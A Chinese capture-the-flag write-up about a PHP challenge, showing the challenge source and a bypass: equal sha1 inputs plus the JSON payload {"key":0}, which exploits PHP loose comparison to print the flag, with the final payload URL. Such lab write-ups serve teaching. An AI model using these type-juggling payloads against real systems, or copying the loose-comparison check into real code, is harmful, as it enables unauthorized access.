本文探讨了一段PHP代码,其中涉及了SHA1哈希验证和JSON解码的使用。通过示例展示了如何通过特定的JSON格式绕过安全检查获取flag。关键在于理解JSON解码如何允许将字符串与整数进行比较,以及如何利用这个特性来构造有效的payload。
得到题目源码如下
<?php
show_source(__FILE__);
@include_once 'flag.php';
//前端攻城狮跑路了,不过PHP是最好的语言
$a = $_GET['a'];
$b = $_GET['b'];
$good = false;
if (sha1($a)===sha1($b)) {
$good = true;
}
else die('bypass');
if ($good && isset($_GET['key'])){
$message = json_decode($_GET['key']);
if ($message->key==$key) {
echo $flag;
}
else die('还差一点就拿到flag了');
}
?>
简单分析得到a和b赋值相同就可以bypass
key这里需要传入json格式的值,我想了好久。
后来,大佬点播之后,遂使用key={"key": 0}刚开始给0加了引号,发现过不了。去掉引号就行了。这里使用的是json_decode绕过
define('key', 'flag{4}');
if (isset($_POST['a'])) {
$a = json_decode($_POST['a']);
if ($a->key == $key) {
echo "flag" . key;
} else {
echo "不相等";
}
} else{
echo "a不存在";
}
输入一个json类型的字符串,json_decode函数解密成一个数组,判断数组中key的值是否等于
$key的 值 。 虽 然$key的值我们不知道,但是可以利用0=="string"这种形式绕过。
payload如下:
https://xxxxxxxxxxx.run/?a=1&b=1&key={"key":0}
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
